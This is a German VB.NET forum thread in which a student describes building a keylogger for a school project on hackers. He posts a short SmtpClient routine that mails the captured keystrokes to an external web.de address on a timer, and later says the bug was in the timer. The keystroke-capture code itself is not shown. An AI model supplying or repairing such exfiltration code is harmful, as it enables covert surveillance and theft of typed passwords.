Mail versenden per VB an Web Mail und mit neuer Verschlüsselung

  • VB.NET

Es gibt 10 Antworten in diesem Thema. Der letzte Beitrag () ist von f-hoehn.

    Mail versenden per VB an Web Mail und mit neuer Verschlüsselung

    Hallo an alle Programmier Freunde,

    ich arbeite grade im Rahmen meiner Projektarbeit an einem selbst programmierten Keylogger der die aufgezeichneten Tasten, per Timer, dann an eine Mail-Adresse schickt.
    Hat bis vor kurzem auch alles perfekt funktioniert bis die ganzen Mailanbieter auf SSL umgestellt haben, wie Ihr höchstwahrscheinlich mitbekommen habt.
    Nun funktioniert die ganze Sache nicht mehr. :(
    Ich habe schon Stunden damit verbracht, zu versuchen den Code so umzuschreiben das er per SSL die Mails verschickt aber bei der angegebenen Mail kommt einfach
    nichts an.
    Hier der Teil des Codes:

    Sub Abschicken()
    Dim smtpserver As New SmtpClient("smtp.web.de")
    Dim email As New MailMessage
    email = New MailMessage
    email.From = New MailAddress("meineMail")
    email.To.Add("meineMail")
    email.Subject = "Projektarbeit"
    email.Body = erhaltenerText.Text
    smtpserver.Credentials = New Net.NetworkCredential("meine Mail", "mein Passwort")
    smtpserver.Port = 587
    smtpserver.Host = "smtp.web.de"
    smtpserver.Send(email)
    End Sub

    Kann mir bitte jemand helfen und mir erklären wie ich den Code umschreiben muss?
    Danke schon mal für jede Hilfe.
    MFG
    Flo
    Thema ist: Hacker - Die Welt der Internetpiraten
    Zu der Arbeit müssen wir ein Produkt "herstellen" was in unserem Fall ein Keylogger
    ist mit dem wir zur Präsentation demonstrieren wollen wie leicht es ist Computer zu manipulieren.
    Ich werde ihn nur dafür und für keine Illegalen Aktivitäten verwenden.
    Hey ich kann euch ja verstehen und weis das man sowas lieber nicht fragen sollte bzg. einens Keyloggers, aber mal ehrlich:
    Ich frage euch doch nicht wie man diesen programmiert sondern nur wie das mit der Mail funktioniert was ja wohl nicht Illegal ist. Ich hätte das ganze Thema auch schreiben können und hätte garnicht erwähnen müssen das es dabei um einen Keylogger geht aber ich hab es gemacht weil ich ehrlich bin!
    Bitte Leute helft mir! Wollt ihr als Beweis die Projektarbeit sehen?
    Das Problem lag nicht an dem Senden der Mail sondern an dem Timer den ich davor gehangen habe. Der war aus irgendeinem Grund gelöscht aber der Code dafür stand noch da, sodass ich dachte es lag am Senden. Habe den alten Code für den Timer einfach nochmal gelöscht und einen neuen Timer eingefügt=Problem gelöst. ;)